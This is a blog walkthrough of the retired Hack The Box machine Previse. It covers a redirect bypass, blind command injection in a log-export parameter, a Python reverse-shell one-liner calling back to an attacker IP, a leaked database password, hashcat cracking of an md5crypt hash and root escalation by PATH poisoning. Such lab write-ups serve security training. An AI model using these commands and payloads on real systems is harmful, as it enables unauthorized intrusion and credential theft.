<!DOCTYPE html>
<html lang="en">
<head>

  <meta charset="utf-8" />

  
  <title>Previse Hackthebox writeup</title>

  
  
  <link href="//cdn.jsdelivr.net" rel="dns-prefetch">
  <link href="//cdnjs.cloudflare.com" rel="dns-prefetch">
  
  <link href="//at.alicdn.com" rel="dns-prefetch">
  
  <link href="//fonts.googleapis.com" rel="dns-prefetch">
  <link href="//fonts.gstatic.com" rel="dns-prefetch">
  
  
  
  <link href="//www.google-analytics.com" rel="dns-prefetch">
  

  

  
  <meta name="author" content="0xMesbaha">
  <meta name="description" content="In this Writeup you will find walkthrough of the retired machine previse From Hackthebox
">

  
  
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:site" content="@gohugoio">
    <meta name="twitter:title" content="Previse Hackthebox writeup">
    <meta name="twitter:description" content="In this Writeup you will find walkthrough of the retired machine previse From Hackthebox
">
    <meta name="twitter:image" content="/media/Previse/start.png">
  

  
  <meta property="og:type" content="article">
  <meta property="og:title" content="Previse Hackthebox writeup">
  <meta property="og:description" content="In this Writeup you will find walkthrough of the retired machine previse From Hackthebox
">
  <meta property="og:url" content="/post/previse/">
  <meta property="og:image" content="/media/Previse/start.png">




<meta name="generator" content="Hugo 0.86.1">


<link rel="canonical" href="/post/previse/">

<meta name="renderer" content="webkit">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="format-detection" content="telephone=no,email=no,adress=no">
<meta http-equiv="Cache-Control" content="no-transform">


<meta name="robots" content="index,follow">
<meta name="referrer" content="origin-when-cross-origin">







<meta name="theme-color" content="#02b875">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="apple-mobile-web-app-title" content="0xMesbaha">
<meta name="msapplication-tooltip" content="0xMesbaha">
<meta name='msapplication-navbutton-color' content="#02b875">
<meta name="msapplication-TileColor" content="#02b875">
<meta name="msapplication-TileImage" content="/icons/icon-144x144.png">
<link rel="icon" href="/favicon.ico">
<link rel="icon" type="image/png" sizes="16x16" href="/icons/icon-16x16.png">
<link rel="icon" type="image/png" sizes="32x32" href="/icons/icon-32x32.png">
<link rel="icon" sizes="192x192" href="/icons/icon-192x192.png">
<link rel="apple-touch-icon" href="/icons/icon-152x152.png">
<link rel="manifest" href="/manifest.json">


<link rel="preload" href="/styles/main-rendered.min.css" as="style">


<link rel="preload" href="https://fonts.googleapis.com/css?family=Lobster" as="style">
<link rel="preload" href="/images/avatar.gif" as="image">
<link rel="preload" href="/images/grey-prism.svg" as="image">


<style>
  body {
    background: rgb(244, 243, 241) url('/images/grey-prism.svg') repeat fixed;
  }
</style>
<link rel="stylesheet" href="/styles/main-rendered.min.css">


<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lobster">



<script src="https://cdn.jsdelivr.net/npm/medium-zoom@1.0.2/dist/medium-zoom.min.js"></script>




<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/video.js@7.3.0/dist/video-js.min.css">



  
  
<!--[if lte IE 8]>
  <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/videojs-ie8@1.1.2/dist/videojs-ie8.min.js"></script>
<![endif]-->

<!--[if lte IE 9]>
  <script src="https://cdn.jsdelivr.net/npm/eligrey-classlist-js-polyfill@1.2.20180112/classList.min.js"></script>
<![endif]-->


</head>
  <body>
    <div class="suspension">
      <a role="button" aria-label="Go to top" title="Go to top" class="to-top is-hide"><span class="icon icon-up" aria-hidden="true"></span></a>
      
        
      
    </div>
    
    
  <header class="site-header">
  <a href=""><img class="avatar" src="/images/avatar.gif" alt="Avatar"></a>
  
  <h2 class="title"><a href="">0xMesbaha</a></h2>
  
  <p class="subtitle"></p>
  <button class="menu-toggle" type="button" aria-label="Main Menu" aria-expanded="false" tab-index="0">
    <span class="icon icon-menu" aria-hidden="true"></span>
  </button>

  <nav class="site-menu collapsed">
    <h2 class="offscreen">Main Menu</h2>
    <ul class="menu-list">
      
      
      
      
        <li class="menu-item
          
          
          ">
          <a href="/">Posts</a>
        </li>
      
        <li class="menu-item
          
          
          ">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="menu-item
          
          
          ">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </nav>
  <nav class="social-menu collapsed">
    <h2 class="offscreen">Social Networks</h2>
    <ul class="social-list"><li class="social-item">
          <a href="//github.com/hussienMisbah" rel="me" title="GitHub" aria-label="GitHub">
	    <span class="icon icon-github" aria-hidden="true"></span>
          </a>
        </li><li class="social-item">
          <a href="//www.linkedin.com/in/hussien-6331151b2" rel="me" title="LinkedIn" aria-label="LinkedIn">
            <span class="icon icon-linkedin" aria-hidden="true"></span>
          </a>
        </li></ul>
  </nav>
</header>

  <section class="main post-detail">
    <header class="post-header">
      <h1 class="post-title">Previse Hackthebox writeup</h1>
      <p class="post-meta">@0xMesbaha · Jan 27, 2022 · 3 min read</p>
    </header>
    <article class="post-content"><p>In this Writeup you will find walkthrough of the retired machine previse From Hackthebox</p>
<p><img src="/media/Previse/start.png" alt="image"></p>
<blockquote>
<p>export IP=10.10.11.104</p>
</blockquote>
<h1 id="scanning-">scanning :</h1>
<h2 id="intial">intial</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">sudo nmap -sV -vv $IP -oN nmap/intial
</code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl <span style="color:#ae81ff">63</span> OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span style="color:#f92672">(</span>Ubuntu Linux; protocol 2.0<span style="color:#f92672">)</span>
80/tcp open  http    syn-ack ttl <span style="color:#ae81ff">63</span> Apache httpd 2.4.29 <span style="color:#f92672">((</span>Ubuntu<span style="color:#f92672">))</span>
</code></pre></div><p>visiting the web page :</p>
<p><img src="/media/Previse/20211002032239.png" alt="image"></p>
<p>tried some sqli but not worked</p>
<h2 id="directory-brute-force-">directory brute-force :</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ gobuster dir -u http://10.10.11.104/ -w /usr/share/dirb/wordlists/big.txt -x php,txt
</code></pre></div><p>found :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">/accounts.php         <span style="color:#f92672">(</span>Status: 302<span style="color:#f92672">)</span> <span style="color:#f92672">[</span>Size: 3994<span style="color:#f92672">]</span> <span style="color:#f92672">[</span>--&gt; login.php<span style="color:#f92672">]</span>
/config.php           <span style="color:#f92672">(</span>Status: 200<span style="color:#f92672">)</span> <span style="color:#f92672">[</span>Size: 0<span style="color:#f92672">]</span>                   
/download.php         <span style="color:#f92672">(</span>Status: 302<span style="color:#f92672">)</span> <span style="color:#f92672">[</span>Size: 0<span style="color:#f92672">]</span> <span style="color:#f92672">[</span>--&gt; login.php<span style="color:#f92672">]</span>                 
/files.php            <span style="color:#f92672">(</span>Status: 302<span style="color:#f92672">)</span> <span style="color:#f92672">[</span>Size: 4914<span style="color:#f92672">]</span> <span style="color:#f92672">[</span>--&gt; login.php<span style="color:#f92672">]</span>              
</code></pre></div><p>you can use curl without enabling redirect  and will notice the same thing immediately</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">curl http://10.10.11.104/accounts.php -vvv     
</code></pre></div><p>But i opened up my burpsuite and observe the requests and response for /accounts.php</p>
<ul>
<li>there is a redirect happen to /login.php again .</li>
<li>i do intercept the redirect and found :</li>
</ul>
<p><img src="/media/Previse/20211002033401.png" alt="image"></p>
<p>hence i want to view and interact with this page , i changed the
HTTP 302 redirect to HTTP 200 OK
<img src="/media/Previse/20211002033552.png" alt="image"></p>
<p>forward it :</p>
<p><img src="/media/Previse/20211002033625.png" alt="image"></p>
<p>i made an account and then redirected me to /login.php again so i logged in successfully</p>
<p><img src="/media/Previse/20211002034057.png" alt="image"></p>
<p>navigating through the tabs found :</p>
<p><img src="/media/Previse/20211002034221.png" alt="image"></p>
<p>so i downloaded the backup and found :
<img src="/media/Previse/20211002034310.png" alt="image"></p>
<p>in config.php :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-php" data-lang="php"><span style="color:#f92672">&lt;?</span><span style="color:#a6e22e">php</span>

<span style="color:#66d9ef">function</span> <span style="color:#a6e22e">connectDB</span>(){
    $host <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;localhost&#39;</span>;
    $user <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;root&#39;</span>;
    $passwd <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;mySQL_p@ssw0rd!:)&#39;</span>;
    $db <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;previse&#39;</span>;
    $mycon <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> <span style="color:#a6e22e">mysqli</span>($host, $user, $passwd, $db);
    <span style="color:#66d9ef">return</span> $mycon;
}

<span style="color:#75715e">?&gt;</span><span style="color:#960050;background-color:#1e0010">
</span></code></pre></div><p>after some navigating in the files :
in /logs.php
<img src="/media/Previse/20211002034826.png" alt="image"></p>
<ul>
<li>
<p>so we can see the exec function  which most likely indicating RCE , and python is executing on a script and seems the script saves output in out.log .</p>
</li>
<li>
<p>understanding the logic at my local machine :
<img src="/media/Previse/20211002041124.png" alt="image"></p>
</li>
<li>
<p>so we can inject any command like : <code>delim=comma;INJECTION</code> However it won&rsquo;t be printed in logs.out so it is a Blind RCE .</p>
</li>
<li>
<p>we can get a shell immediatley</p>
</li>
</ul>
<p>[+] from <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python">here</a></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python">python <span style="color:#f92672">-</span>c <span style="color:#e6db74">&#39;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&#34;10.10.16.120&#34;,1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([&#34;/bin/sh&#34;,&#34;-i&#34;])&#39;</span>
</code></pre></div><p><img src="/media/Previse/20211002041602.png" alt="image"></p>
<p><img src="/media/Previse/20211002041508.png" alt="image"></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#75715e"># stablizie the shell</span>
<span style="color:#960050;background-color:#1e0010">$</span> python <span style="color:#f92672">-</span>c <span style="color:#e6db74">&#34;import pty;pty.spawn(&#39;/bin/bash&#39;)&#34;</span>
</code></pre></div><p>hence we are in the machine now so we can access local host and view data base :D</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">mysql -h localhost -u root -p previse
</code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">
mysql<span style="color:#f92672">&gt;</span> <span style="color:#66d9ef">SELECT</span> <span style="color:#66d9ef">table_name</span> <span style="color:#66d9ef">FROM</span> information_schema.tables;
</code></pre></div><p><img src="/media/Previse/20211002042525.png" alt="image"></p>
<ul>
<li>
<p>so we need m4lware password only <code>i guess :3</code> let&rsquo;s get it and try crack the hash from here:
<a href="https://gist.github.com/dwallraff/6a50b5d2649afeb1803757560c176401">https://gist.github.com/dwallraff/6a50b5d2649afeb1803757560c176401</a></p>
</li>
<li>
<p>we can see it is a md5crypt hash</p>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ hashcat -m <span style="color:#ae81ff">500</span> -a <span style="color:#ae81ff">0</span> hashed_m4lware /usr/share/wordlists/rockyou.txt
<span style="color:#75715e"># 500 : md5crypt</span>
<span style="color:#75715e"># 0   : straight attack mode</span>
<span style="color:#75715e"># output :</span>
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!
</code></pre></div><p><img src="/media/Previse/20211002043827.png" alt="image"></p>
<h2 id="privilege-escalation">privilege escalation</h2>
<p><img src="/media/Previse/20211002043918.png" alt="image"></p>
<p>so let&rsquo;s read the script :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash"><span style="color:#75715e">#!/bin/bash
</span><span style="color:#75715e"></span>
<span style="color:#75715e"># We always make sure to store logs, we take security SERIOUSLY here</span>

<span style="color:#75715e"># I know I shouldnt run this as root but I cant figure it out programmatically on my account</span>
<span style="color:#75715e"># This is configured to run with cron, added to sudo so I can run as needed - we&#39;ll fix it later when there&#39;s time</span>

gzip -c /var/log/apache2/access.log &gt; /var/backups/<span style="color:#66d9ef">$(</span>date --date<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;yesterday&#34;</span> +%Y%b%d<span style="color:#66d9ef">)</span>_access.gz
gzip -c /var/www/file_access.log &gt; /var/backups/<span style="color:#66d9ef">$(</span>date --date<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;yesterday&#34;</span> +%Y%b%d<span style="color:#66d9ef">)</span>_file_access.gz

</code></pre></div><ul>
<li>so it simply makes a backup for the logs with gzip .</li>
<li>we should focus on how to manipulate gzip .</li>
</ul>
<h3 id="path-poisoning">PATH poisoning</h3>
<ul>
<li>we can see here :
<a href="https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/">https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/</a></li>
</ul>
<p>we can use that so when we execute this as root &ldquo;with sudo&rdquo; gzip will refer to the /tmp in the path
<img src="/media/Previse/20211002044848.png" alt="image"></p>
<p>i don&rsquo;t know why but the shell doesn&rsquo;t return any result although i gained the root access so i make a reverse shell and it worked perfectly</p>
<p><img src="/media/Previse/20211002045036.png" alt="image"></p>
<h1 id="pwned">Pwned</h1></article>
    <footer class="post-footer">
      
      <ul class="post-tags">
        
          <li><a href="/tags/hackthebox"><span class="tag">Hackthebox</span></a></li>
        
          <li><a href="/tags/rce"><span class="tag">RCE</span></a></li>
        
          <li><a href="/tags/path-poisoning"><span class="tag">Path Poisoning</span></a></li>
        
      </ul>
      
      <p class="post-copyright">
        © all rights reserved for 0xMesbaha.
      </p>
    </footer>
    
      
    
  </section>
  
<footer class="site-footer">
  <p>© 2017-2022 0xMesbaha</p>
  <p>Powered by <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> with theme <a href="https://github.com/laozhu/hugo-nuo" target="_blank" rel="noopener">Nuo</a>.</p>
  
</footer>


<script src="https://cdn.jsdelivr.net/npm/smooth-scroll@15.0.0/dist/smooth-scroll.min.js"></script>



<script async src="https://cdn.jsdelivr.net/npm/video.js@7.3.0/dist/video.min.js"></script>




<script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
    tex2jax: {
      inlineMath: [['$','$'], ['\\(','\\)']],
      displayMath: [['$$','$$'], ['\\[','\\]']],
      processEscapes: true,
      processEnvironments: true,
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
      TeX: { equationNumbers: { autoNumber: "AMS" },
      extensions: ["AMSmath.js", "AMSsymbols.js"] }
    },
  });
</script>
<script type="text/x-mathjax-config">
  // Fix <code> tags after MathJax finishes running. This is a
  // hack to overcome a shortcoming of Markdown. Discussion at
  // https://github.com/mojombo/jekyll/issues/199
  MathJax.Hub.Queue(() => {
    MathJax.Hub.getAllJax().map(v => v.SourceElement().parentNode.className += ' has-jax');
  });
</script>



<script src="/scripts/index.min.js"></script>

<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.register('\/service-worker.js').then(function() {
      console.log('[ServiceWorker] Registered');
    });
  }
</script>




<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
	ga('create', 'UA-XXXXXXXX-X', 'auto');
	
	ga('send', 'pageview');
}
</script>
<script async src='https://www.google-analytics.com/analytics.js'></script>







  </body>
</html>
